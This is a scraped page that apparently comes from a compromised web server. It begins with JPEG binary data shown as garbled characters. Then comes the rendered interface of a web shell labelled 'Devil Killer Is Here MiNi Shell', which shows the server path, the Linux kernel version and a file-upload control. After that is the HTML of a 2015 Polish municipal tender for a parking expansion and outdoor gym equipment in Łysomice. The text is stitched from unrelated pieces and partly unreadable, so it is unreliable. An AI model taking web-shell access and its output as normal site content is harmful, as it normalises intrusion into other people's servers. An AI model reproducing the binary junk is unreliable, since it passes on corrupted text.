JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150504/102288-N-2015.html

<p class="kh_header"><b>Łysomice: Rozbudowa parkingu o dodatkową powierzchnię parkingową wraz 
z modernizacją nawierzchni w Łysomicach oraz montaż siłowni zewnętrznych 
i stojaków na rowery w Gminie Łysomice</b><br>
<b>Numer ogłoszenia: 102288 - 2015; data zamieszczenia: 04.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Łysomice , ul. Warszawska 8, 87-148 Łysomice, woj. kujawsko-pomorskie, tel. (056) 678 32 22, faks (056) 678 32 22 w.23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lysomice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa parkingu o dodatkową powierzchnię parkingową wraz 
z modernizacją nawierzchni w Łysomicach oraz montaż siłowni zewnętrznych 
i stojaków na rowery w Gminie Łysomice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje realizację zadania pn. Rozbudowa parkingu 
o dodatkową powierzchnię parkingową wraz z modernizacją nawierzchni 
w Łysomicach oraz montaż siłowni zewnętrznych i stojaków na rowery w Gminie Łysomice,
2.	Zamówienie zostało podzielone na 2 części:
1)	Część nr 1 - rozbudowa parkingu o dodatkową powierzchnię parkingową wraz z modernizacją nawierzchni przy ul. Warszawskiej 6 i 8 w Łysomicach, na dz. 168/12, 168/14, 168/15, 168/16, 168/28,: 
2)	Część nr 2 - dostawa siłowni zewnętrznych oraz stojaków rowerowych 
w wybranych miejscowościach gminy Łysomice wraz z montażem oraz wykonaniem prac towarzyszących;
3.	Wykonawca zamówienia jest odpowiedzialny za jakość wykonania robót budowlanych, dostarczanego sprzętu i jego montażu oraz za ich zgodność 
z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych i przedmiarem do kosztorysu ofertowego oraz poleceniami Inspektora nadzoru. Prace budowlane oraz montażowe należy wykonywać zgodnie ze sztuką budowlaną, Polskimi Normami oraz posiadaną wiedzą techniczną i doświadczeniem budowlanym / w zakresie montażu siłowni zewnętrznych.  
4.	Szczegółowe warunki wykonania zamówienia na roboty budowlane i dostawę 
z montażem oraz zakres robót określają: umowa, której wzór stanowi Załącznik nr 1 do SIWZ, kosztorys ofertowy z przedmiarem robót budowlanych stanowiące Załącznik nr 9 do SIWZ oraz dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiące Załącznik nr 8 do SIWZ. Jednocześnie treść tych załączników zawiera istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego.
5.	Wskazane przez Zamawiającego pozycje katalogowe w kosztorysie ofertowym z przedmiarami robót, dokumentacji projektowej oraz STWIOR należy traktować jako rozszerzenie opisu robót oraz dostaw. W przypadku występowania w materiałach przetargowych jednoznacznych nazw materiałów wskazujących na producenta i konkretny typ katalogowy- wszystkie takie nazwy każdorazowo należy czytać z klauzulą ,,lub równoważne o takich samych lub nie gorszych parametrach technicznych, jakościowych oraz estetycznych (kompozycyjnych),,. Za produkt równoważny Zamawiający uznaje taki, które ma te same cechy funkcjonalne co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt oraz taki, który charakteryzuje się taką samą dostępnością do sieci serwisowej / gwarancyjnej. Jego jakość nie może być gorsza od jakości określonej w dokumentacji przetargowej. Produkt równoważny powinien mieć parametry nie gorsze niż wskazany produkt, jednocześnie umożliwiając uzyskanie efektu założonego przez Zamawiającego za pomocą innych rozwiązań technicznych. Przez pojęcia cech jakościowych i technicznych produktu równoważnego należy rozumieć cechy, które opisują fizyczne, właściwości przedmiotu zamówienia (np. wydajność, żywotność odporność, łatwość obsługi, bezpieczeństwo eksploatacji, komfort użytkowania, standard wykończenia, itd.).
6.	Zamawiający informuje, iż kosztorys ofertowy z przedmiarem robót budowlanych stanowiący Załącznik nr 9 do SIWZ należy traktować jako informacje pomocnicze przydatne do sporządzenia oferty w postępowaniu i kalkulacji ceny za realizację zamówienia.
7.	Cenę oferty należy obliczyć w PLN z dokładnością do dwóch miejsc po przecinku na podstawie Załącznika nr 9 (kosztorys ofertowy z przedmiarem robót), dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych stanowiących Załącznik nr 8 do SIWZ oraz innych kosztów koniecznych do poniesienia celem terminowej i prawidłowej realizacji przedmiotu zamówienia. Cena oferty musi zawierać wszystkie koszty związane z realizacją zadania wynikające wprost z przedmiaru, dokumentacji projektowej i STWIOR, jak również koszty wszelkich robót przygotowawczych, porządkowych, organizacji placu budowy wraz z jego późniejszą likwidacją, koszty utrzymania zaplecza budowy. Wymagany przez Zamawiającego załącznik do oferty 
w postaci kosztorysu ofertowego jest jedynie dokumentem pomocniczym, który będzie wykorzystany do obliczenia należnego wynagrodzenia Wykonawcy 
w przypadku odstąpienia od umowy bądź rozliczenia ewentualnych robót zamiennych i nie będzie podlegał ocenie na etapie oceny ofert. Ewentualne braki pozycji robót w kosztorysie ofertowym nie stanowią podstawy do żądania dodatkowego wynagrodzenia. Cena musi zawierać wszystkie koszty związane 
z realizacją zamówienia. Dlatego też Zamawiający proponuje i umożliwia zainteresowanym Wykonawcom przeprowadzenie wizji lokalnej miejsca robót 
w celu umożliwienia Wykonawcy dokładnego zapoznania się z terenem, na którym będą wykonywane roboty budowlane, co pozwoli na rzetelną ocenę niezbędnego zakresu prac, a w konsekwencji właściwe skalkulowanie ceny za realizację zamówienia. Wizja lokalna po uprzednim kontakcie telefonicznym wyznaczonym przedstawicielem Zamawiającego (pkt. VIII.6 SIWZ). Zaleca się również, aby Wykonawca zapoznał się z treścią aktualnych map zasadniczych znajdujących się w zasobach Starostwa Powiatowego w Toruniu.
8.	Wymagany okres gwarancji i rękojmi dla przedmiotu zamówienia wynosi:  
1)	Dla Części 01 Zamówienia:
a)	na wykonane roboty budowlane - co najmniej 60 miesięcy (5 lat); 
b)	na urządzenia wbudowane/zamontowane przez Wykonawcę - okres gwarancji zgodny z okresem gwarancji producenta, nie krótszy jednak niż 24 miesiące (2 lata), okres rękojmi 60 miesięcy (5 lat);
2)	Dla Części 02 Zamówienia:
a)	na wykonane roboty budowlane - co najmniej 60 miesięcy (5 lat); 
b)	na urządzenia wbudowane/zamontowane przez Wykonawcę - zgodnie z oświadczeniem Wykonawcy w ofercie, co najmniej 36 miesięcy (3 lata);
liczony od dnia dokonania bezusterkowego odbioru końcowego przedmiotu umowy przez Zamawiającego, potwierdzonego protokołem.
9.	Wszelkie informacje zawarte w niniejszej SIWZ przeznaczone są wyłącznie do przygotowania oferty i w żadnym wypadku nie powinny być wykorzystane w innym celu ani udostępniane osobom trzecim nie uczestniczącym w postępowaniu, chyba że jest to konieczne i niezbędne do udziału w postępowaniu i przygotowania oferty. 
10.	Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.21.22.10-1, 37.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Składając ofertę wykonawca obowiązany będzie zabezpieczyć ofertę wadium w następującej wysokości:
1)	Część 01 zamówienia: 8 000,00 zł;
2)	Część 02 zamówienia: 8 000,00 zł;
2.	Wadium może być wniesione w następujących formach:
1)	w pieniądzu,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3.	Wadium w pieniądzu wnosi się przed upływem terminu składania ofert na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Toruniu Oddział Łysomice 
Nr  35 9511 0000 2002 0032 0267 0003, Tyt.: wadium, nr sprawy ZP-271.2.2015, Część . . zamówienia
4.	Wadium wniesione w formie innej niż pieniężna musi posiadać ważność co najmniej do końca terminu związania Wykonawcy złożoną przez niego ofertą.
5.	Wadium złożone w formie innej niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w uPZP. Gwarancja bankowa lub ubezpieczeniowa powinna być nieodwołalna i bezwarunkowa oraz płatna na pierwsze żądanie.
6.	Wadium złożone w innej formie niż pieniężna, należy załączyć do oferty w oddzielnej kopercie z dopiskiem wadium.
7.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem normy art. 46 ust. 4a uPZP. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
9.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
4)	jeżeli Wykonawca w odpowiedzi na wezwanie, nie złożył dokumentów lub oświadczeń, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
11.	Wykonawca, który składa ofertę na więcej niż jedną część zamówienia może dokonać zapłaty wadium dla tych części jednym przelewem bankowym lub wnieść wadium dla tych części na jednym dokumencie, o którym mowa w pkt 2.2)-5).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja podmiotowa wykonawców, w tym wymogi dotyczące wpisu do rejestru zawodowego lub handlowego. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; tj. są uprawnieni do uczestnictwa w obrocie prawnym na podstawie odrębnych przepisów, 
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 uPZP.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń, wg formuły spełnia / nie spełnia, z zastrzeżeniem art. 26 ust. 3 i 4 uPZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają wymaganą wiedzę i doświadczenie, tj.:
Dla Części 01 zamówienia: w ciągu pięciu ostatnich lat przed terminem składania ofert (jeżeli działają krócej - w okresie prowadzenia działalności) wykonali należycie co najmniej 1 umowę której przedmiotem było wykonanie robót budowlanych w zakresie budowy lub rozbudowy dróg lub parkingów wraz z odwodnieniem o wartości co najmniej 350 000,00 zł brutto, a należyte wykonanie tej umowy zostało potwierdzone referencjami; 
Dla Części 02 zamówienia: w ciągu trzech ostatnich lat przed terminem składania ofert (jeżeli działają krócej - w okresie prowadzenia działalności) wykonali należycie co najmniej 1 umowę której przedmiotem była dostawa i montaż urządzeń siłowni zewnętrznych o wartości co najmniej 350 000,00 zł brutto, a należyte wykonanie tej umowy zostało potwierdzone referencjami; 
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń, wg formuły spełnia / nie spełnia, z zastrzeżeniem art. 26 ust. 3 i 4 uPZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Części 01 zamówienia: dysponują osobami posiadającymi wymagane uprawnienia budowlane wynikające z postanowień ustawy z dnia 7 lipca 1994r.-Prawo budowlane (jednolity tekst Dz. U. nr 75 z 2010r., poz. 474- z późn. zm.) zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75, poz. 690- z późn. zm.), tj.: co najmniej jedną osobą posiadającą uprawnienia do kierowania budowlanymi branży drogowej; co najmniej jedną osobą posiadającą uprawnienia do kierowania budowlanymi w branży elektrycznej, co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w branży sanitarnej, (Zamawiający dopuszcza dysponowanie uprawnieniami do kierowania robotami budowlanymi w w/w zakresie przez jedną bądź łącznie przez kilka osób),
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń, wg formuły spełnia / nie spełnia, z zastrzeżeniem art. 26 ust. 3 i 4 uPZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: 
posiadają środki finansowe na rachunku bankowym lub zdolność kredytową co najmniej w wysokości połowy ceny oferty złożonej w ramach niniejszego postępowania,
są objęci ochroną ubezpieczeniową w ramach ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności i posiadanego mienia, a poziom tej ochrony powinien spełniać co najmniej poniższe wymogi: 
przedmiot ubezpieczenia - obejmuje m.in. działalność gospodarczą związaną z przedmiotem zamówienia, na które Wykonawca składa ofertę,
zakres ubezpieczenia: szkody osobowe i rzeczowe będące następstwem czynów niedozwolonych (odpowiedzialność deliktowa) oraz wynikające 
z niewykonania lub nienależytego wykonania zobowiązania (odpowiedzialność kontraktowa), 
suma gwarancyjna - nie niższa niż 350 000 zł na jedno i wszystkie zdarzenia w okresie ubezpieczenia,
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie wymaganych dokumentów i oświadczeń, wg formuły spełnia / nie spełnia, z zastrzeżeniem art. 26 ust. 3 i 4 uPZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
